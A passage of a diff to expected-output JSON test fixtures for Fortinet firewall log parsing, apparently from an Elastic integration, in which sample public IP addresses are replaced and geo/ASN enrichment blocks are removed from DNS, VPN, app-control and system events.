incidentserialno=23465 url=\"/\" msg=\"Web.Client: HTTPS.BROWSER,\" apprisk=\"medium\" scertcname=\"test.elastic.co\"", "code": "1059028704", "timezone": "-0400", "kind": "event", @@ -588,23 +513,8 @@ "level": "notice" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 53, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "dns": { "question": { @@ -613,7 +523,7 @@ "class": "IN" }, "resolved_ip": [ - "8.8.8.8" + "67.43.156.13" ], "id": "2234" }, @@ -660,7 +570,7 @@ ], "ip": [ "192.168.2.1", - "8.8.8.8" + "67.43.156.13" ] }, "fortinet": { @@ -677,8 +587,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133608700Z", - "original": "\u003c189\u003edate=2020-04-23 time=12:17:29 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1501054802\" type=\"utm\" subtype=\"dns\" eventtype=\"dns-response\" level=\"notice\" vd=\"root\" eventtime=1587230249360109339 tz=\"-0500\" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf=\"port1\" srcintfrole=\"lan\" dstip=8.8.8.8 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" proto=17 profile=\"test\" xid=2234 qname=\"elastic.example.com\" qtype=\"A\" qtypeval=1 qclass=\"IN\" ipaddr=\"8.8.8.8\" msg=\"Domain is monitored\" action=\"pass\" cat=23 catdesc=\"Web-based Email\"", + "ingested": "2021-12-09T13:37:22.357773900Z", + "original": "\u003c189\u003edate=2020-04-23 time=12:17:29 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1501054802\" type=\"utm\" subtype=\"dns\" eventtype=\"dns-response\" level=\"notice\" vd=\"root\" eventtime=1587230249360109339 tz=\"-0500\" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" proto=17 profile=\"test\" xid=2234 qname=\"elastic.example.com\" qtype=\"A\" qtypeval=1 qclass=\"IN\" ipaddr=\"67.43.156.13\" msg=\"Domain is monitored\" action=\"pass\" cat=23 catdesc=\"Web-based Email\"", "code": "1501054802", "timezone": "-0500", "kind": "event", @@ -699,23 +609,8 @@ "level": "notice" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 53, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "dns": { "question": { @@ -724,8 +619,8 @@ "class": "IN" }, "resolved_ip": [ - "8.8.8.8", - "8.8.4.4" + "67.43.156.13", + "67.43.156.13" ], "id": "2234" }, @@ -772,8 +667,7 @@ ], "ip": [ "192.168.2.1", - "8.8.8.8", - "8.8.4.4" + "67.43.156.13" ] }, "fortinet": { @@ -790,8 +684,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133616Z", - "original": "\u003c189\u003edate=2020-04-23 time=12:17:29 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1501054802\" type=\"utm\" subtype=\"dns\" eventtype=\"dns-response\" level=\"notice\" vd=\"root\" eventtime=1587230249360109339 tz=\"-0500\" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf=\"port1\" srcintfrole=\"lan\" dstip=8.8.8.8 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" proto=17 profile=\"test\" xid=2234 qname=\"elastic.example.com\" qtype=\"A\" qtypeval=1 qclass=\"IN\" ipaddr=\"8.8.8.8, 8.8.4.4\" msg=\"Domain is monitored\" action=\"pass\" cat=23 catdesc=\"Web-based Email\"", + "ingested": "2021-12-09T13:37:22.357778600Z", + "original": "\u003c189\u003edate=2020-04-23 time=12:17:29 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1501054802\" type=\"utm\" subtype=\"dns\" eventtype=\"dns-response\" level=\"notice\" vd=\"root\" eventtime=1587230249360109339 tz=\"-0500\" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" proto=17 profile=\"test\" xid=2234 qname=\"elastic.example.com\" qtype=\"A\" qtypeval=1 qclass=\"IN\" ipaddr=\"67.43.156.13, 67.43.156.13\" msg=\"Domain is monitored\" action=\"pass\" cat=23 catdesc=\"Web-based Email\"", "code": "1501054802", "timezone": "-0500", "kind": "event", @@ -812,23 +706,8 @@ "level": "information" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 443, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "rule": { "ruleset": "elasticruleset", @@ -886,7 +765,7 @@ ], "ip": [ "192.168.2.1", - "8.8.8.8" + "67.43.156.13" ] }, "fortinet": { @@ -905,8 +784,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133623500Z", - "original": "\u003c190\u003edate=2020-04-23 time=12:17:11 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1059028704\" type=\"utm\" subtype=\"app-ctrl\" eventtype=\"signature\" level=\"information\" vd=\"root\" eventtime=1587230232148674303 tz=\"-0500\" appid=40568 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 dstip=8.8.8.8 srcport=63012 dstport=443 srcintf=\"port1\" srcintfrole=\"lan\" dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"SSL\" direction=\"outgoing\" policyid=100602 sessionid=543234 applist=\"elasticruleset\" action=\"pass\" appcat=\"Web.Client\" app=\"HTTPS.BROWSER\" hostname=\"elastic.no\" incidentserialno=54323 url=\"/\" msg=\"Web.Client: HTTPS.BROWSER,\" apprisk=\"medium\"", + "ingested": "2021-12-09T13:37:22.357783Z", + "original": "\u003c190\u003edate=2020-04-23 time=12:17:11 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1059028704\" type=\"utm\" subtype=\"app-ctrl\" eventtype=\"signature\" level=\"information\" vd=\"root\" eventtime=1587230232148674303 tz=\"-0500\" appid=40568 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 dstip=67.43.156.13 srcport=63012 dstport=443 srcintf=\"port1\" srcintfrole=\"lan\" dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"SSL\" direction=\"outgoing\" policyid=100602 sessionid=543234 applist=\"elasticruleset\" action=\"pass\" appcat=\"Web.Client\" app=\"HTTPS.BROWSER\" hostname=\"elastic.no\" incidentserialno=54323 url=\"/\" msg=\"Web.Client: HTTPS.BROWSER,\" apprisk=\"medium\"", "code": "1059028704", "timezone": "-0500", "kind": "event", @@ -926,23 +805,8 @@ "level": "notice" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 53, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "dns": { "question": { @@ -951,7 +815,7 @@ "class": "IN" }, "resolved_ip": [ - "8.8.8.8" + "67.43.156.13" ], "id": "2352" }, @@ -998,7 +862,7 @@ ], "ip": [ "192.168.2.1", - "8.8.8.8" + "67.43.156.13" ] }, "fortinet": { @@ -1015,8 +879,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133630600Z", - "original": "\u003c189\u003edate=2020-04-23 time=12:17:04 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1501054802\" type=\"utm\" subtype=\"dns\" eventtype=\"dns-response\" level=\"notice\" vd=\"root\" eventtime=1587230224712900694 tz=\"-0500\" policyid=26 sessionid=5432 srcip=192.168.2.1 srcport=54438 srcintf=\"port1\" srcintfrole=\"lan\" dstip=8.8.8.8 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" proto=17 profile=\"elastictest\" xid=2352 qname=\"elastic.co\" qtype=\"A\" qtypeval=1 qclass=\"IN\" ipaddr=\"8.8.8.8\" msg=\"Domain is monitored\" action=\"pass\" cat=93 catdesc=\"Remote Access\"", + "ingested": "2021-12-09T13:37:22.357787800Z", + "original": "\u003c189\u003edate=2020-04-23 time=12:17:04 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1501054802\" type=\"utm\" subtype=\"dns\" eventtype=\"dns-response\" level=\"notice\" vd=\"root\" eventtime=1587230224712900694 tz=\"-0500\" policyid=26 sessionid=5432 srcip=192.168.2.1 srcport=54438 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" proto=17 profile=\"elastictest\" xid=2352 qname=\"elastic.co\" qtype=\"A\" qtypeval=1 qclass=\"IN\" ipaddr=\"67.43.156.13\" msg=\"Domain is monitored\" action=\"pass\" cat=93 catdesc=\"Remote Access\"", "code": "1501054802", "timezone": "-0500", "kind": "event", @@ -1037,23 +901,8 @@ "level": "information" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 53, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "dns": { "question": { @@ -1104,7 +953,7 @@ ], "ip": [ "192.168.2.1", - "8.8.8.8" + "67.43.156.13" ] }, "fortinet": { @@ -1119,8 +968,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133637700Z", - "original": "\u003c190\u003edate=2020-04-23 time=12:17:12 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1500054000\" type=\"utm\" subtype=\"dns\" eventtype=\"dns-query\" level=\"information\" vd=\"root\" eventtime=1587230232658642672 tz=\"-0500\" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=54788 srcintf=\"port1\" srcintfrole=\"lan\" dstip=8.8.8.8 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" proto=17 profile=\"elastictest\" xid=235 qname=\"elastic.co\" qtype=\"A\" qtypeval=1 qclass=\"IN\"", + "ingested": "2021-12-09T13:37:22.357794Z", + "original": "\u003c190\u003edate=2020-04-23 time=12:17:12 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1500054000\" type=\"utm\" subtype=\"dns\" eventtype=\"dns-query\" level=\"information\" vd=\"root\" eventtime=1587230232658642672 tz=\"-0500\" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=54788 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" proto=17 profile=\"elastictest\" xid=235 qname=\"elastic.co\" qtype=\"A\" qtypeval=1 qclass=\"IN\"", "code": "1500054000", "timezone": "-0500", "kind": "event", @@ -1139,23 +988,8 @@ "level": "notice" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 443, - "ip": "8.8.4.4" + "ip": "67.43.156.13" }, "rule": { "ruleset": "somecerts", @@ -1206,7 +1040,7 @@ ], "ip": [ "192.168.2.1", - "8.8.4.4" + "67.43.156.13" ] }, "fortinet": { @@ -1222,8 +1056,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133645Z", - "original": "\u003c189\u003edate=2020-04-23 time=13:15:18 devname=\"testswitch2\" devid=\"someotherid\" logid=\"1700062001\" type=\"utm\" subtype=\"ssl\" eventtype=\"ssl-anomalies\" level=\"notice\" vd=\"root\" eventtime=1587230118838592454 tz=\"-0400\" policyid=12 sessionid=42346234 service=\"HTTPS\" user=\"elasticuser2\" group=\"elasticgroup2\" profile=\"somecerts\" srcip=192.168.2.1 srcport=59726 dstip=8.8.4.4 dstport=443 srcintf=\"LAN\" srcintfrole=\"lan\" dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 action=\"passthrough\" msg=\"Server certificate passed\" reason=\"untrusted-cert\"", + "ingested": "2021-12-09T13:37:22.357800Z", + "original": "\u003c189\u003edate=2020-04-23 time=13:15:18 devname=\"testswitch2\" devid=\"someotherid\" logid=\"1700062001\" type=\"utm\" subtype=\"ssl\" eventtype=\"ssl-anomalies\" level=\"notice\" vd=\"root\" eventtime=1587230118838592454 tz=\"-0400\" policyid=12 sessionid=42346234 service=\"HTTPS\" user=\"elasticuser2\" group=\"elasticgroup2\" profile=\"somecerts\" srcip=192.168.2.1 srcport=59726 dstip=67.43.156.13 dstport=443 srcintf=\"LAN\" srcintfrole=\"lan\" dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 action=\"passthrough\" msg=\"Server certificate passed\" reason=\"untrusted-cert\"", "code": "1700062001", "timezone": "-0400", "kind": "event", @@ -1284,7 +1118,7 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133652500Z", + "ingested": "2021-12-09T13:37:22.357806500Z", "original": "\u003c189\u003edate=2020-04-23 time=12:32:48 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0102043014\" type=\"event\" subtype=\"user\" level=\"notice\" vd=\"root\" eventtime=1587231168439640874 tz=\"-0500\" logdesc=\"FSSO logon authentication status\" srcip=10.10.10.10 user=\"elasticouser\" server=\"elasticserver\" action=\"FSSO-logon\" msg=\"FSSO-logon event from FSSO_elasticserver: user elasticouser logged on 10.10.10.10\"", "code": "0102043014", "timezone": "-0500", @@ -1305,45 +1139,15 @@ "level": "error" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 500, - "ip": "8.8.4.4" + "ip": "67.43.156.13" }, "rule": { "description": "IPsec phase 1 error" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 500, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "message": "IPsec phase 1 error", "tags": [ @@ -1362,8 +1166,7 @@ }, "related": { "ip": [ - "8.8.8.8", - "8.8.4.4" + "67.43.156.13" ] }, "fortinet": { @@ -1380,8 +1183,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133659900Z", - "original": "\u003c187\u003edate=2020-04-23 time=12:32:47 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101037124\" type=\"event\" subtype=\"vpn\" level=\"error\" vd=\"root\" eventtime=1587231168339114138 tz=\"-0500\" logdesc=\"IPsec phase 1 error\" msg=\"IPsec phase 1 error\" action=\"negotiate\" remip=8.8.4.4 locip=8.8.8.8 remport=500 locport=500 outintf=\"wan2\" cookies=\"345hkjhdrs87/0000000000000000\" user=\"N/A\" group=\"N/A\" xauthuser=\"N/A\" xauthgroup=\"N/A\" assignip=N/A vpntunnel=\"N/A\" status=\"negotiate_error\" reason=\"peer SA proposal not match local policy\" peer_notif=\"NOT-APPLICABLE\"", + "ingested": "2021-12-09T13:37:22.357812600Z", + "original": "\u003c187\u003edate=2020-04-23 time=12:32:47 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101037124\" type=\"event\" subtype=\"vpn\" level=\"error\" vd=\"root\" eventtime=1587231168339114138 tz=\"-0500\" logdesc=\"IPsec phase 1 error\" msg=\"IPsec phase 1 error\" action=\"negotiate\" remip=67.43.156.13 locip=67.43.156.13 remport=500 locport=500 outintf=\"wan2\" cookies=\"345hkjhdrs87/0000000000000000\" user=\"N/A\" group=\"N/A\" xauthuser=\"N/A\" xauthgroup=\"N/A\" assignip=N/A vpntunnel=\"N/A\" status=\"negotiate_error\" reason=\"peer SA proposal not match local policy\" peer_notif=\"NOT-APPLICABLE\"", "code": "0101037124", "timezone": "-0500", "kind": "event", @@ -1400,45 +1203,15 @@ "level": "notice" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 3356, - "organization": { - "name": "Level 3 Parent, LLC" - } - }, "port": 500, - "ip": "8.4.5.4" + "ip": "67.43.156.13" }, "rule": { "description": "Progress IPsec phase 1" }, "source": { - "geo": { - "continent_name": "Europe", - "country_name": "France", - "location": { - "lon": 2.3387, - "lat": 48.8582 - }, - "country_iso_code": "FR" - }, - "as": { - "number": 19281, - "organization": { - "name": "Quad9" - } - }, "port": 500, - "ip": "9.9.9.9" + "ip": "67.43.156.13" }, "message": "progress IPsec phase 1", "tags": [ @@ -1460,8 +1233,7 @@ }, "related": { "ip": [ - "9.9.9.9", - "8.4.5.4" + "67.43.156.13" ] }, "fortinet": { @@ -1482,8 +1254,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133667100Z", - "original": "\u003c189\u003edate=2020-04-23 time=12:32:31 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101037127\" type=\"event\" subtype=\"vpn\" level=\"notice\" vd=\"root\" eventtime=1587231151628960857 tz=\"-0500\" logdesc=\"Progress IPsec phase 1\" msg=\"progress IPsec phase 1\" action=\"negotiate\" remip=8.4.5.4 locip=9.9.9.9 remport=500 locport=500 outintf=\"wan1\" cookies=\"df868dsg876d/0000000000000000\" user=\"N/A\" group=\"N/A\" xauthuser=\"N/A\" xauthgroup=\"N/A\" assignip=N/A vpntunnel=\"elasticvpn\" status=\"success\" init=\"local\" mode=\"main\" dir=\"outbound\" stage=1 role=\"initiator\" result=\"OK\"", + "ingested": "2021-12-09T13:37:22.357818800Z", + "original": "\u003c189\u003edate=2020-04-23 time=12:32:31 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101037127\" type=\"event\" subtype=\"vpn\" level=\"notice\" vd=\"root\" eventtime=1587231151628960857 tz=\"-0500\" logdesc=\"Progress IPsec phase 1\" msg=\"progress IPsec phase 1\" action=\"negotiate\" remip=67.43.156.13 locip=67.43.156.13 remport=500 locport=500 outintf=\"wan1\" cookies=\"df868dsg876d/0000000000000000\" user=\"N/A\" group=\"N/A\" xauthuser=\"N/A\" xauthgroup=\"N/A\" assignip=N/A vpntunnel=\"elasticvpn\" status=\"success\" init=\"local\" mode=\"main\" dir=\"outbound\" stage=1 role=\"initiator\" result=\"OK\"", "code": "0101037127", "timezone": "-0500", "kind": "event", @@ -1535,7 +1307,7 @@ }, "message": "Performance statistics: average CPU: 0, memory: 23, concurrent sessions: 20, setup-rate: 0", "event": { - "ingested": "2021-06-29T09:32:55.133674300Z", + "ingested": "2021-12-09T13:37:22.357824800Z", "original": "\u003c189\u003edate=2020-04-23 time=14:32:09 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0100040704\" type=\"event\" subtype=\"system\" level=\"notice\" vd=\"root\" eventtime=1587231129938795255 tz=\"-0300\" logdesc=\"System performance statistics\" action=\"perf-stats\" cpu=0 mem=10 totalsession=23 disk=0 bandwidth=\"23/4\" setuprate=0 disklograte=0 fazlograte=0 freediskstorage=331 sysuptime=25170 msg=\"Performance statistics: average CPU: 0, memory: 23, concurrent sessions: 20, setup-rate: 0\"", "code": "0100040704", "timezone": "-0300", @@ -1599,7 +1371,7 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133681700Z", + "ingested": "2021-12-09T13:37:22.357830900Z", "original": "\u003c189\u003edate=2020-04-23 time=12:32:09 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0102043039\" type=\"event\" subtype=\"user\" level=\"notice\" vd=\"root\" eventtime=1587231130109462858 tz=\"-0500\" logdesc=\"Authentication logon\" srcip=10.10.10.10 user=\"elastiiiuser\" authserver=\"FSSO_elastiauth\" action=\"auth-logon\" status=\"logon\" msg=\"User elastiiiuser added to auth logon\"", "code": "0102043039", "timezone": "-0500", @@ -1620,39 +1392,15 @@ "level": "notice" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 3356, - "organization": { - "name": "Level 3 Parent, LLC" - } - }, "port": 500, - "ip": "8.8.5.4" + "ip": "67.43.156.13" }, "rule": { "description": "Progress IPsec phase 1" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, "port": 500, - "ip": "7.6.3.4" + "ip": "67.43.156.14" }, "message": "progress IPsec phase 1", "tags": [ @@ -1674,8 +1422,8 @@ }, "related": { "ip": [ - "7.6.3.4", - "8.8.5.4" + "67.43.156.14", + "67.43.156.13" ] }, "fortinet": { @@ -1696,8 +1444,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133689Z", - "original": "\u003c189\u003edate=2020-04-23 time=12:32:00 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101037127\" type=\"event\" subtype=\"vpn\" level=\"notice\" vd=\"root\" eventtime=1587231120608961118 tz=\"-0500\" logdesc=\"Progress IPsec phase 1\" msg=\"progress IPsec phase 1\" action=\"negotiate\" remip=8.8.5.4 locip=7.6.3.4 remport=500 locport=500 outintf=\"wan1\" cookies=\"345khj34566/0000000000000000\" user=\"N/A\" group=\"N/A\" xauthuser=\"N/A\" xauthgroup=\"N/A\" assignip=N/A vpntunnel=\"testvpn\" status=\"success\" init=\"local\" mode=\"main\" dir=\"outbound\" stage=1 role=\"initiator\" result=\"OK\"", + "ingested": "2021-12-09T13:37:22.357837200Z", + "original": "\u003c189\u003edate=2020-04-23 time=12:32:00 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101037127\" type=\"event\" subtype=\"vpn\" level=\"notice\" vd=\"root\" eventtime=1587231120608961118 tz=\"-0500\" logdesc=\"Progress IPsec phase 1\" msg=\"progress IPsec phase 1\" action=\"negotiate\" remip=67.43.156.13 locip=67.43.156.14 remport=500 locport=500 outintf=\"wan1\" cookies=\"345khj34566/0000000000000000\" user=\"N/A\" group=\"N/A\" xauthuser=\"N/A\" xauthgroup=\"N/A\" assignip=N/A vpntunnel=\"testvpn\" status=\"success\" init=\"local\" mode=\"main\" dir=\"outbound\" stage=1 role=\"initiator\" result=\"OK\"", "code": "0101037127", "timezone": "-0500", "kind": "event", @@ -1740,7 +1488,7 @@ "message": "FortiSandbox AV database updated", "event": { "start": "2020-04-18T14:24:15.301-03:00", - "ingested": "2021-06-29T09:32:55.133696300Z", + "ingested": "2021-12-09T13:37:22.357843300Z", "original": "\u003c189\u003edate=2020-04-23 time=14:24:13 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0100041006\" type=\"event\" subtype=\"system\" level=\"notice\" vd=\"root\" eventtime=1587230655301863513 tz=\"-0300\" logdesc=\"FortiSandbox AV database updated\" version=\"1.522479\" msg=\"FortiSandbox AV database updated\"", "code": "0100041006", "timezone": "-0300", @@ -1800,7 +1548,7 @@ }, "event": { "start": "2020-04-18T12:23:47.558-05:00", - "ingested": "2021-06-29T09:32:55.133703700Z", + "ingested": "2021-12-09T13:37:22.357849400Z", "original": "\u003c190\u003edate=2020-04-23 time=12:23:47 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0107045057\" type=\"event\" subtype=\"endpoint\" level=\"information\" vd=\"root\" eventtime=1587230627558979735 tz=\"-0500\" logdesc=\"FortiClient connection added\" action=\"add\" status=\"success\" license_limit=\"unlimited\" used_for_type=3 connection_type=\"sslvpn\" count=2 user=\"elastico\" ip=172.16.0.2 name=\"somerouter\" fctuid=\"645234fdd01F885824F764\" msg=\"Add a FortiClient Connection.\"", "code": "0107045057", "timezone": "-0500", @@ -1812,22 +1560,7 @@ "level": "information" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.6" + "ip": "67.43.156.13" }, "rule": { "description": "SSL VPN new connection" @@ -1849,7 +1582,7 @@ }, "related": { "ip": [ - "8.8.8.6" + "67.43.156.13" ] }, "fortinet": { @@ -1863,8 +1596,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133711Z", - "original": "\u003c190\u003edate=2020-04-23 time=12:23:47 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101039943\" type=\"event\" subtype=\"vpn\" level=\"information\" vd=\"root\" eventtime=1587230627334405765 tz=\"-0500\" logdesc=\"SSL VPN new connection\" action=\"ssl-new-con\" tunneltype=\"ssl\" tunnelid=2 remip=8.8.8.6 user=\"N/A\" group=\"N/A\" dst_host=\"N/A\" reason=\"N/A\" msg=\"SSL new connection\"", + "ingested": "2021-12-09T13:37:22.357885900Z", + "original": "\u003c190\u003edate=2020-04-23 time=12:23:47 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101039943\" type=\"event\" subtype=\"vpn\" level=\"information\" vd=\"root\" eventtime=1587230627334405765 tz=\"-0500\" logdesc=\"SSL VPN new connection\" action=\"ssl-new-con\" tunneltype=\"ssl\" tunnelid=2 remip=67.43.156.13 user=\"N/A\" group=\"N/A\" dst_host=\"N/A\" reason=\"N/A\" msg=\"SSL new connection\"", "code": "0101039943", "timezone": "-0500", "kind": "event", @@ -1882,22 +1615,7 @@ "level": "information" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 3356, - "organization": { - "name": "Level 3 Parent, LLC" - } - }, - "ip": "8.8.5.4" + "ip": "67.43.156.13" }, "rule": { "description": "SSL VPN tunnel up" @@ -1930,7 +1648,7 @@ "someuser" ], "ip": [ - "8.8.5.4" + "67.43.156.13" ] }, "fortinet": { @@ -1946,8 +1664,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133718100Z", - "original": "\u003c190\u003edate=2020-04-23 time=12:23:47 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101039947\" type=\"event\" subtype=\"vpn\" level=\"information\" vd=\"root\" eventtime=1587230627698970007 tz=\"-0500\" logdesc=\"SSL VPN tunnel up\" action=\"tunnel-up\" tunneltype=\"ssl-tunnel\" tunnelid=2345 remip=8.8.5.4 tunnelip=10.10.10.10 user=\"someuser\" group=\"somegroup\" dst_host=\"N/A\" reason=\"tunnel established\" msg=\"SSL tunnel established\"", + "ingested": "2021-12-09T13:37:22.357893800Z", + "original": "\u003c190\u003edate=2020-04-23 time=12:23:47 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101039947\" type=\"event\" subtype=\"vpn\" level=\"information\" vd=\"root\" eventtime=1587230627698970007 tz=\"-0500\" logdesc=\"SSL VPN tunnel up\" action=\"tunnel-up\" tunneltype=\"ssl-tunnel\" tunnelid=2345 remip=67.43.156.13 tunnelip=10.10.10.10 user=\"someuser\" group=\"somegroup\" dst_host=\"N/A\" reason=\"tunnel established\" msg=\"SSL tunnel established\"", "code": "0101039947", "timezone": "-0500", "kind": "event", @@ -2006,7 +1724,7 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133725300Z", + "ingested": "2021-12-09T13:37:22.357900200Z", "original": "\u003c189\u003edate=2020-04-23 time=14:16:42 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0102043015\" type=\"event\" subtype=\"user\" level=\"notice\" vd=\"root\" eventtime=1587230204674924332 tz=\"-0300\" logdesc=\"FSSO log off authentication status\" srcip=192.168.1.1 user=\"elasticadmin\" server=\"FSSO_somefssoserver\" action=\"FSSO-logoff\" msg=\"FSSO-logoff event from FSSO_somefssoserver: user elasticuser logged off 1192.168.1.1\"", "code": "0102043015", "timezone": "-0300", @@ -2039,7 +1757,7 @@ }, "fortinet": { "firewall": { - "server": "9.9.9.9", + "server": "67.43.156.13", "action": "connect", "type": "event", "subtype": "system", @@ -2049,11 +1767,11 @@ "rule": { "description": "FortiCloud server connected" }, - "message": "FortiCloud 9.9.9.9 server is connected", + "message": "FortiCloud 67.43.156.13 server is connected", "event": { "start": "2020-04-18T12:16:03.121-05:00", - "ingested": "2021-06-29T09:32:55.133732500Z", - "original": "\u003c189\u003edate=2020-04-23 time=12:16:02 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0100022915\" type=\"event\" subtype=\"system\" level=\"notice\" vd=\"root\" eventtime=1587230163121116383 tz=\"-0500\" logdesc=\"FortiCloud server connected\" server=\"9.9.9.9\" action=\"connect\" msg=\"FortiCloud 9.9.9.9 server is connected\"", + "ingested": "2021-12-09T13:37:22.357905Z", + "original": "\u003c189\u003edate=2020-04-23 time=12:16:02 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0100022915\" type=\"event\" subtype=\"system\" level=\"notice\" vd=\"root\" eventtime=1587230163121116383 tz=\"-0500\" logdesc=\"FortiCloud server connected\" server=\"67.43.156.13\" action=\"connect\" msg=\"FortiCloud 67.43.156.13 server is connected\"", "code": "0100022915", "timezone": "-0500", "kind": "event" @@ -2093,7 +1811,7 @@ "message": "FortiCloud 4.4.4.4 server is disconnected", "event": { "start": "2020-04-18T12:16:03.375-05:00", - "ingested": 